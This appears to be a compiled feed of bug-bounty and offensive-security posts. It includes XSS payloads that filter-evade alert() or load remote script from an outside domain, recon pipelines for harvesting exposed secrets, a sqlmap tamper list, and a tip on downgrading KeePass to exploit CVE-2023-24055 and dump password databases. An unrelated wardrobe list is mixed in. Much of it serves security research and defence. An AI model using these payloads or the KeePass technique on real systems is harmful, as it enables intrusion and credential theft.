An XSS payload with alert obfuscation, to bypass a regex filter
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
Improve your #XSS reports! 🔥
Use our https://X55.is ✨ domain
✅ Replacing alert(1)
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>
✅ As href/src attribute
<Base Href=//X55.is>
<Script Src=//X55.is>
📌 Automated JavaScript Secret Detection
1 - Collect alive domains
docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50
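The detection step of the pipeline above, reduced to its core as an added JavaScript example (not the post's own code, and not the ruleset of nuclei or trufflehog): match known key shapes, apply an entropy floor so placeholders do not become findings, and run it over a constructed sample bundle. Rule names, thresholds and sample values are assumptions.

```javascript
// Added example, not code from the original post or from nuclei/trufflehog:
// the core of the secret-detection step, run over a constructed JS bundle.
// Known key shapes are matched by pattern, then ranked by Shannon entropy
// so placeholders and low-entropy junk do not become findings.
'use strict';
// Key-shape rules. The AWS access-key-id prefix is public knowledge; the
// other two are generic assumed shapes, not any scanner's ruleset.
const PATTERNS = [
  { name: 'aws-access-key-id', re: /\bAKIA[0-9A-Z]{16}\b/g, minEntropy: 0 },
  { name: 'generic-api-key',
    re: /\b(?:api[_-]?key|secret|token)["']?\s*[:=]\s*["']([A-Za-z0-9_\-]{20,})["']/gi,
    minEntropy: 3.5 },
  { name: 'bearer-token', re: /Bearer\s+([A-Za-z0-9_\-.=]{20,})/g, minEntropy: 3.5 },
];
// Shannon entropy in bits per character: random-looking secrets score
// around 4 or more, a placeholder like "xxxxxxxxxxxxxxxxxxxx" scores 0.
function shannonEntropy(s) {
  const counts = new Map();
  for (const ch of s) counts.set(ch, (counts.get(ch) || 0) + 1);
  let h = 0;
  for (const c of counts.values()) {
    const p = c / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// Returns one finding per match that clears its rule's entropy floor.
function findSecrets(source) {
  const findings = [];
  for (const { name, re, minEntropy } of PATTERNS) {
    for (const m of source.matchAll(re)) {
      const value = m[1] !== undefined ? m[1] : m[0];
      const entropy = shannonEntropy(value);
      if (entropy < minEntropy) continue;
      const line = source.slice(0, m.index).split('\n').length;
      findings.push({ rule: name, line, entropy: Number(entropy.toFixed(2)), value });
    }
  }
  return findings;
}

// Constructed sample bundle (not captured from any site). The AWS key is the
// documentation example key, the Bearer value is a made-up JWT-shaped token.
const SAMPLE_BUNDLE = `
const cfg = { apiKey: "xxxxxxxxxxxxxxxxxxxxxxxx" };
fetch("/api", { headers: { Authorization: "Bearer eyJhbGciOiJIUzI1NiJ9.c2FtcGxl.Q1pVdT4" } });
const s3 = new Client({ accessKeyId: "AKIAIOSFODNN7EXAMPLE" });
`;
```

Running `findSecrets(SAMPLE_BUNDLE)` reports the AWS key and the bearer token but not the all-x placeholder, which is the false positive the entropy floor exists to drop.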
Template Engines Injection 101
https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
7 Tips for bug bounty beginners
https://blog.intigriti.com/hacking-tools/7-tips-for-bug-bounty-beginners
😈 [ Diego Capriotti @naksyn ]
This has been one of my favorites for a while, but now it's time to let it go.
Here's my preferred way of getting the KeePass db that we often hunt for:
downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.
The target can remain clean and you can simply check for the dump creation.
KeePass version 2.53 can still open kdbx files created with version 2.57, and if using a proper xml the user will likely notice nothing.
Update alerts can also be disabled within the xml.
🔗 https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8
🐥 [ tweet ]
My new post sharing an investigation on a $243M theft from last month which led to multiple arrests and $9M+ frozen
https://x.com/zachxbt/status/1836752923830702392?
Subdomain Enumeration Using Web Archive
This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.
function wayback() {
  # Query the Wayback Machine CDX API for every archived URL under *.$1,
  # keep only the host part of each URL, strip any :port, and de-duplicate.
  curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}
Stored XSS Critical or NOT?: https://medium.com/@mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5
CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab
What You'll Learn 💡
1️⃣ Overview | Description of CVE-2024-45409
2️⃣ Reconnaissance For CVE-2024-45409
Shodan.io
Censys.io
Fofa.info
Hunter.how
ZoomEYE.HK
3️⃣ Exploit ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit
4️⃣ Exploit Installation 📥
5️⃣ Exploit Tool Guide 🧭
6️⃣ Impact 💥
7️⃣ Severity ⚠️
8️⃣ Remediation ♻️
https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/
CVE-2024-31449 and others: multiple vulnerabilities in Redis, rated 4.5 to 8.8 ❗️
Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors.
Search at Netlas.io:
👉 Link: https://nt.ls/1G7ul
👉 Dork: protocol:redis
Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5
🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability.
https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/
32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre
https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
Easy logic bug that leaks the email for every user: https://medium.com/@banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5
https://x.com/0x0SojalSec/status/1850608716095295555?t=blxmzovwhe3Wy4CPvezKvw&s=35
💉 Awesome Sqlmap Tampers.
• SQLMap Tamper List;
• space2comment.py;
• randomcase.py;
• between.py;
• charencode.py;
• equaltolike.py;
• appendnullbyte.py;
• base64encode.py;
• chardoubleencode.py;
• commalesslimit.py;
• halfversionedmorekeywords.py;
• modsecurityversioned.py;
• space2hash.py;
• overlongutf8.py;
• randomcomments.py;
• unionalltounion.py;
• versionedkeywords.py;
• space2dash.py;
• multiplespaces.py;
• nonrecursivereplacement.py;
• space2comment.py;
• equaltolike.py;
• space2tab.py;
• between.py;
• charencode.py;
• space2dash.py;
• lowercase.py;
• How to write Tamper Script for SQLMap.
#Sqlmap
https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5
#justforinfo
If you are a man, then your wardrobe should at least have: 1 pair of navy blue chinos, 1 pair of beige chinos, 1 pair of jeans, 1 pair of black trousers, 3 pairs of slacks/suit pants (black, navy blue, grey), 1 pair of beige linen trousers, 3 white t-shirts, 3 black t-shirts, 3 navy blue t-shirts, 1 white shirt, 1 white linen shirt with short sleeves, 1 black shirt, 1 navy blue shirt, 3 polos in neutral colors, 1 suit jacket (matching one of your slacks - one complete suit), 1 neutral jacket, 2 belts (brown and black), 1 pair of white sneakers, 2 pairs of Oxfords (brown and black - to match your belts), 2 sweatshirts in neutral colors, 1 hoodie.
Here are a few good GraphQL reports to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
https://x.com/0x0SojalSec/status/1844104351662612734?t=xNLitsY0oO8iXlg62OPlvg&s=35
XSS in Phone Number Field? 👇
Recently I re-watched the NahamCon2022EU talk RTFR (Read The Bleeping RFC) by securinti.
One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.
How is that possible?
According to the RFC it is possible to append an "optional parameter" to the number. Something like:
• 10203040;ext=+22
• 10203040;isub=12345
• 10203040;phone-context=example
This can lead to XSS if:
1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context"
2. The phone number is reflected on the web interface without input validation or output encoding
So payloads like "10203040;phone-context=<script>alert(1)</script>" CAN be a valid phone number and trigger XSS
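As an added example (not from the post, and not any phone-number library's code), a strict allow-list check for the number;param=value form using the charsets of the RFC 3966 grammar, with HTML encoding at the reflection step; the function names and the simplified number charset are assumptions. Under this check the phone-context payload above fails condition 1, and the encoding covers condition 2 for whatever is accepted.

```javascript
// Added example, not code from the original post or from any phone-number
// library: a strict allow-list parser for "number;param=value" using the
// RFC 3966 charsets (a simplification of the full tel URI grammar).
'use strict';

// number = optional "+", digits and the RFC's visual separators "-" "." "(" ")"
// (local-number hex digits, "*" and "#" are left out of this simplification).
const NUMBER_RE = /^\+?[0-9][0-9.()\-]*$/;

// Only parameters the RFC defines, each with its own value charset.
const ALLOWED = {
  // extension = ";ext=" 1*phonedigit
  'ext': /^[0-9.()\-]+$/,
  // isdn-subaddress = ";isub=" 1*uric  (RFC 2396 uric minus ";", which is the
  // parameter separator; note uric never contains "<", ">", "\"" or a space)
  'isub': /^[A-Za-z0-9\-_.!~*'()%/?:@&=+$,]+$/,
  // descriptor = domainname / global-number-digits
  'phone-context': /^(\+[0-9][0-9.()\-]*|[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]*[A-Za-z0-9])?)*)$/,
};

function parsePhoneInput(raw) {
  const [number, ...rest] = String(raw).split(';');
  if (!NUMBER_RE.test(number)) return { ok: false, reason: 'invalid number' };
  const params = new Map(); // a Map, so a parameter named "constructor" cannot hit Object.prototype
  for (const piece of rest) {
    const eq = piece.indexOf('=');
    const name = (eq === -1 ? piece : piece.slice(0, eq)).toLowerCase();
    const value = eq === -1 ? '' : piece.slice(eq + 1);
    if (!Object.prototype.hasOwnProperty.call(ALLOWED, name)) return { ok: false, reason: `unknown parameter "${name}"` };
    if (!ALLOWED[name].test(value)) return { ok: false, reason: `invalid value for "${name}"` };
    if (params.has(name)) return { ok: false, reason: `duplicate parameter "${name}"` };
    params.set(name, value);
  }
  return { ok: true, number, params };
}

// Reflection step: entity-encode everything echoed back, the rejection reason
// included (it quotes attacker-controlled parameter names).
function htmlEscape(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderPhone(raw) {
  const r = parsePhoneInput(raw);
  if (!r.ok) return `<span class="error">${htmlEscape(r.reason)}</span>`;
  const tail = [...r.params].map(([k, v]) => `;${k}=${v}`).join('');
  return `<span class="phone">${htmlEscape(r.number + tail)}</span>`;
}
```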
World's fastest unlimited single and bulk subdomain finder! Use desktop!
https://cyfare.net/apps/subfind/